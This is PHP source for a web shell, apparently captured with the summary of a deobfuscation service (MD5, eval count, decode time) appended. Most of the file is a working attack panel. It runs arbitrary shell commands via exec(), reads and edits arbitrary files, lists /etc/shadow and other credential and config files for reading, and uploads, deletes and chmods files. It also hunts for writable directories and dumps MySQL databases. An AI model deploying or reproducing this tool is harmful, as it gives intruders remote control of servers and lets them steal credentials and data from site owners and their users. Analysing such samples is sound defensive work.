function e($e){switch($e){
case 0:return('no such file');
case 1:return('no such dirictory');
case 2:return('permission denied');
case 3:return('is not dirictory');
case 4:return('is a dirictory');
}}
function test_file($filename){
return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
if(isset($_POST['downl']) && !empty($_POST['downf'])){
if(!preg_match('/^\//',$_POST['downf'])){
$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
if(!test_file($_POST['downf'])){
if(!is_dir($_POST['downf'])){
$fd=fopen($_POST['downf'], "rb");
$nam=preg_replace('/.+\//','',$_POST['downf']);
header("Content-Type: application/octet-stream; name=\"".$nam."\"");
header("Content-Length: ".filesize($_POST['downf']));
header("Content-disposition: attachment; filename=\"".$nam."\"");
while(!feof($fd)){
$buffer=fgets($fd,4096);
echo $buffer;
}
fclose ($fd);
exit;
}
else $error=font('red',e(4));
}
else $error=test_file($_POST['downf']);}
if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
$text="<body bgcolor=#C2DDFF>
<b>Mysql@server:user:pass:db</b>
<form method='POST'>
";
$a=array('server','user','password','db');$i=-1;
while($i++<3){
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
$text.="<input type='submit' name='sql' value='Connect'>
<input type='submit' name='exitsql' value='Exit'>";
$text="\n<body bgcolor=#C2DDFF>
<b>Mysql@server:user:pass:db</b>
<form method='POST'>\n";
$a=array('srv','user','pass','db');$i=-1;
while($i++<3){
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
if(isset($_POST['sql'])){
if(isset($_POST['user']))$user=$_POST['user'];
if(isset($_POST['pass']))$password=$_POST['pass'];
if(isset($_POST['srv'])){
$server=$_POST['srv'];
$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
else{die($text."</form>");}
if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
function write($data){
switch($_POST['save']){
case 0:
global $dump;
$dump.=$data;
break;
case 1:
global $fp;
switch($_POST['compr']){
case 0:
fwrite($fp,$data);
break;
case 1:
gzwrite($fp, $data);
break;
case 2:
bzwrite($fp,$data);
break;}
break;}}
function sqlh(){
global $dump,$server;
write("#\n#Server : ".getenv('SERVER_NAME')."
#DB_Host : ".$server."
#DB : ".$_POST['db']."
#Table : ".$_POST['table_sel']."\n#\n\n");}
function sql(){
global $dump,$connect;
$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
function sql1(){
global $connect;
$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
function test($aaa){
$d=array();
while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
return($d);}
while ($line=mysql_fetch_assoc($result)) {
((!isset($key))?($key=implode('`, `',array_keys($line))):null);
$ddd=test(array_values($line));
$val=implode('\', \'',$ddd);
write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
mysql_free_result($result);}
function head($tmpfname,$name){
header("Content-Type: application/octet-stream; name=\"$name\"");
header("Content-Length: ".filesize($tmpfname)."");
header("Content-disposition: attachment; filename=\"$name\"");
$fd=fopen($tmpfname, "r");
while(!feof($fd)){
echo fgets($fd, 4096);}
fclose($fd);
unlink($tmpfname);
exit;}
if(isset($_POST['back']) && isset($_POST['table_sel'])){
$dump='';
if($_POST['save']==1){
$tmpfname=tempnam($_POST['save_p'], "FOO");
switch($_POST['compr']){
case 0:
$fp=fopen($tmpfname,"w");
break;
case 1:
$fp=gzopen($tmpfname, "w9");
break;
case 2:
$fp=bzopen($tmpfname, "w");
break;}}
switch($_POST['as']){
case 0:
switch($_POST['as_sql']){
case 0:
sqlh();
sql();
break;
case 1:
sqlh();
sql();
sql1();
break;
case 2:
sqlh();
sql1();
break;}
if($_POST['save']==1){
switch($_POST['compr']){
case 0:
$n='.txt';
fclose($fp);
break;
case 1:
$n='.gz';
gzclose($fp);
break;
case 2:
$n='.bz2';
bzclose($fp);
break;}
head($tmpfname,$_POST['table_sel'].$n);}
break;
case 1:
$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
if(mysql_num_rows($res) > 0) {
while($row = mysql_fetch_assoc($res)) { 
$values = array_values($row); 
foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
$values = implode($_POST['cvs_term'], $values); 
write($values);}}
break;}}
echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
$db_list=mysql_list_dbs($connect);
echo "<select name='db' multiple size=30>\n";
while($row=mysql_fetch_object($db_list)){
$db1=$row->Database;
echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
echo "</select></td><td bgcolor=#CBC3B6>\n";
if(!empty($_POST['db'])){
$tb_list=mysql_list_tables($_POST['db']);
echo "<select name='table_sel' multiple size=30>";
for($i=0;$i<mysql_num_rows($tb_list);$i++){
$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
echo "</select></td><td width=100%>
<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
if(isset($_POST['table_sel'])){
$c=array('Browse','SQL','Insert','Export');$i=-1;
while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
elseif(isset($_POST['push']))$_POST['go']=1;
if(isset($_POST['back']))$_POST['go']=3;
if(isset($_POST['brow']))$_POST['go']=0;
if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
if(isset($_POST['ed_save']))$_POST['go']=5;
if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
if(isset($_POST['go'])){switch($_POST['go']){
case 0:
if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
$result=mysql_query($_POST['querysql'],$connect);}
else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
if(isset($_POST['br_st']) && isset($_POST['br_en'])){
$co=$_POST['br_en'].','.$_POST['br_st'];}
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
for($i=0;$i<mysql_num_fields($result);$i++){
if(ereg('primary_key',mysql_field_flags($result, $i)))
$prim=mysql_field_name($result, $i);}
$up_e='';
echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
if(!isset($lk)){
echo "<td><b>EDIT</b></td>";
foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
if(!isset($prim)){
while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
$up_e=substr($up_e,0,-5);}
else{while(list($key,$val)=each($line)){
if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
$up_e=urlencode($up_e);
echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
$up_e='';
foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
echo "</tr>\n";}
echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
<input type=submit name=editr value=Edit>";
mysql_free_result($result);
break;
case 1:
echo "<input type=submit name=push value=Run><br>
<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
if(!empty($_POST['querysql'])){
$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
break;
case 2:
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
for($i=0;$i<mysql_num_fields($fields);$i++){
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
break;
case 3:
if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD>
<table height=100%>
<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr>
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr>
<tr><td height=100%></td></tr>
</table></TD><td>
<table width="140" height=100%>
<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR>
<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
<tr><td height=100%></tb></tr>
</table>
</td><td>
<table height=100%>
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
<tr><td height=100%></td></tr>
</table></td><td>
<table width="120" height=100%>
<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
<tr><td height=100%></td></tr>':'').'</table></td></TR>
<tr><td><input type=submit value=backup name=back></td></tr>
</table>';
if(isset($_POST['back']) && isset($_POST['table_sel'])){
if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
break;
case 4:
if(isset($_POST['edit'])){
$up_e=$_POST['edit'];
echo "<input type=hidden name=edit value='$up_e'>";
$up_e=urldecode($_POST['edit']);
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
foreach($line as $key=>$col_value) {
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
$fi++;}}
echo "</table></div><input type=submit name=ed_save value=Save>";}
break;
case 5:
$ted='';
$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
while(list($key1,$val1)=each($_POST2)){
if(preg_match('/ed_key:(.+)/',$key1,$m))
{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
$ted=substr($ted,0,-2);
$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
break;}}
echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
else echo $text;
echo "</form></body>";exit;}
echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
if(!empty($_POST['th']))@chdir($_POST['th']);
echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
#UP
if(isset($_POST['up']))@chdir('../');
#CD
if(isset($_POST['c']) && $_POST['cd']!=''){
if(!test_file($_POST['cd'])){
if(is_dir($_POST['cd'])){
@chdir($_POST['cd']);
}
else $error=font('red',e(3));
}
else $error=test_file($_POST['cd']);}
echo w(3)."<input type=text size=60 value=".getcwd().">";
echo font('blue','USER : '.get_current_user());
if(file_exists("/"))
echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
if(file_exists("C:/"))
echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
echo "<br>";
?>
<hr>
<form method=POST name=main>
<input type="submit" value="^" name="up">
<input type=text name=cd>
<input type=submit value=cd name=c>
<input type=text name=open>
<input type=submit value=open name=op>
<input type=text name=new>
<input type=submit name=cr value="new file">
<input type=text name=exec>
<input type=submit name=exe value=exec>
<input type=submit name=info value=phpinfo>
<br>
<?php
$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
echo '<select name=passwd>';
foreach($ar_file as $ar_l){
if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
echo '</select><input type=submit name=passw value="read file">';
?>
<input type=submit name=menu value=upload>
<input type=text name=downf>
<input type=submit name=downl value=download>
<input type=text name="test">
<input type=submit name=tes value="perms">
<input type="submit" name="sql" value="mysql">
<input type="submit" name="eval" value="eval">
<br>
<input type=text name=strin>
<input type=text name=remot>
<input type=submit name=copy value=copy>
<input type="text" name="renold" >
<input type="text" name="rennew" >
<input type="submit" name="rename" value="rename">
<input type=text name=rm >
<input type=submit name=del value=del>
<br>
<input type=reset value=RESET>
<input type="text" name="mkdir">
<input type="submit" name="mk" value="mkdir">
<input type="text" name="rmdir">
<input type="submit" name="rmd" value="rmdir">
<input type="text" name="ch_mod">
<?php
for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
echo"</select>";}
?>
<input type="submit" name="ch_chmod" value="chmod">
<input type=submit name=find value='find writeable'>
<br>
<hr>
<?php
#FIND WRITEABLE##############
if(isset($_POST['find'])){
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
if(isset($_POST['fww']) && !empty($_POST['fpath'])){
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
$arrfw=array($_POST['fpath']);
$ife=0;
while(++$ife<=count($arrfw)){
$pathfw=$arrfw[$ife-1];
if(is_readable($pathfw)){
if($hfw=opendir($pathfw)){
while(false!==($ffw=readdir($hfw))){
$ffw=$pathfw.$ffw;
if(!preg_match('/\/\.+$/',$ffw)){
if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
closedir($hfw);}}}}


if(isset($_POST['eval'])){
echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";





echo "";
}
############################################################################
#RENAME
if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
if(file_exists($_POST['renold'])){
@rename($_POST['renold'],$_POST['rennew']);
}
else $error=font('red',e(0));
}
#

#RMDIR
if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
if(file_exists($_POST['rmdir'])){
if(is_dir($_POST['rmdir'])){
if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); 
else $error=font('red','dir not deleted');
}
else $error=font('red',e(3));
}
else $error=font('red',e(0));
}
#
#CHMOD
if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
if(file_exists($_POST['ch_mod'])){
@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
else $error=font('red',e(0));}
#
#DELETE
if(isset($_POST['del']) && $_POST['rm']!=''){
if(file_exists($_POST['rm'])){
if(!is_dir($_POST['rm'])){
@unlink($_POST['rm']);
}
else echo "<br>".font('red',e(4)."<br>");
}
else echo "<br>".font('red',e(0)."<br>");
}
#
#EXEC
if(!empty($_POST['exe'])){
if(@exec($_POST['exec'],$ar)){
echo "<textarea cols=70 rows=15>";
foreach($ar as $line){
echo $line."\n";
}
echo "</textarea>";}}
#
#OPEN FILE
if(isset($_POST['op']) && $_POST['open']!=''){
if(!test_file($_POST['open'])){
if(!is_dir($_POST['open'])){
$fil=file($_POST['open']);
echo "<textarea cols=100 rows=20 name=edit>";
foreach($fil as $vv){
echo htmlspecialchars($vv);
}
echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
if(is_writable($_POST['open'])==1){
echo w(2).font('green','ACCESS GRANTED');
echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
}}
else $error=font('red',e(2));
}
else $error=test_file($_POST['open']);
}
if(isset($_POST['save'])){
$fr=fopen($_POST['sv'],"w");
$out=$_POST['edit'];
fputs($fr,$out);
fclose($fr);
}
#
#CREATE FILE
if(isset($_POST['cr']) && $_POST['new']!=''){
if(is_writable(dirname($_POST['new']))){
echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
<input type=submit name=cre value=create>
<input type=hidden value=".$_POST['new']."  name=nf>";
}
else echo "<br>".font('red',e(2)."<br>");
}
if(isset($_POST['cre'])){
$ee=fopen($_POST['nf'],'w+');
$out=$_POST['newf'];
fputs($ee,$out);
fclose($ee);
}
#
#MKDIR
if(isset($_POST['mk']) && $_POST['mkdir']!=''){
if(is_writeable('./')){
@mkdir($_POST['mkdir']);
echo font('green',"dir ".b($_POST['mkdir'])." create"); 
}
else echo font('red',e(2));
}
#
echo "<input type=hidden name=th value=".getcwd()."></form>";
#UPLOAD FILE
if(isset($_POST['menu']) || isset($_POST['qq'])){
echo "
<form enctype=multipart/form-data  method=post>
Save as :<input type=text name=name>File :<input name=userfile type=file>
<input type=submit value=Send name=go_up>
<input type=hidden name=qq>
<input type=hidden name=th value=".getcwd()."></form>";
if(isset($_POST['go_up'])){
if(isset($_POST['name']) && $_POST['name']==''){
$_POST['name']=$_FILES['userfile']['name'];}
if(!preg_match('/^\//',$_POST['name'])){
$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
else echo "<br>".font('red',"Permisions denied");}}
#
#TEST PERM
if(isset($_POST['tes']) && $_POST['test']!=''){
$j=$_POST['test'];
if(file_exists($j)){
$w='';
if(is_writeable($j)){
$w=w(1).'WRITE'.w(1);
}
if(is_readable($j)){
$w=$w.w(1).'READ'.w(1);
}
echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
}
else echo font('red',$e(0));
}
#
#COPY
if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
if(file_exists(dirname($_POST['remot']))){
if(file_exists($_POST['strin'])){
if(is_writable(dirname($_POST['remot']))){
if(is_readable($_POST['strin'])){
@copy($_POST['strin'],$_POST['remot']);
}
else echo font('red',"no read string file");
}
else echo font('red',"no write dest directory");
}
else echo font('red',"no such file");
}
else echo font('red',"no such dest dir");
}
#
#CHECK DISK
if(isset($_POST['free']) && $_POST['dirfree']!=''){
if(file_exists($_POST['dirfree'])){
$fre=@disk_free_space($_POST['dirfree'])/1048576;
echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
$fre1=@disk_total_space($_POST['dirfree'])/1048576;
echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
}
else echo font('red',"No such disk");
}
#
(isset($_POST['info']))?phpinfo():null;
#
#PASSWD
if(!empty($_POST['passwd']) && isset($_POST['passw'])){
echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
foreach(@file($_POST['passwd']) as $fed)echo $fed;
echo "</textarea><br>\n";}
#
if(isset($error))echo $error;?>
<hr><?php
##################################################################################
if(is_readable(getcwd())){
if($h=opendir(getcwd())){
$arr=array();
while(false!==($f=readdir($h))){array_push ($arr,$f);}
closedir($h);}}
else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
sort($arr);
echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
foreach($arr as $f){
$l=@lstat($f);
print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
$r=sprintf("%o",(@fileperms($f)) & 0777);
$ow=posix_getpwuid($l[4]);
$gr=posix_getgrgid($l[5]);
$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
echo "</td><td>$r</td><td>$fow</td>";
if(!is_dir($f)){
if(!is_link($f)){
echo w(2)."<td><i>".$l[7]."</i></td>";}
else echo "</td><td>link</td>";}
else echo "</td><td>DIR</td>";
$fi=htmlspecialchars($f);
echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
?>
</table></body></html>
<?php exit; ?>

Function Calls

ini_restore 2
get_magic_quotes_gpc 1

Variables

None

Stats

MD5 12ca297cadbc475234f71b3542c1e518
Eval Count 0
Decode Time 190 ms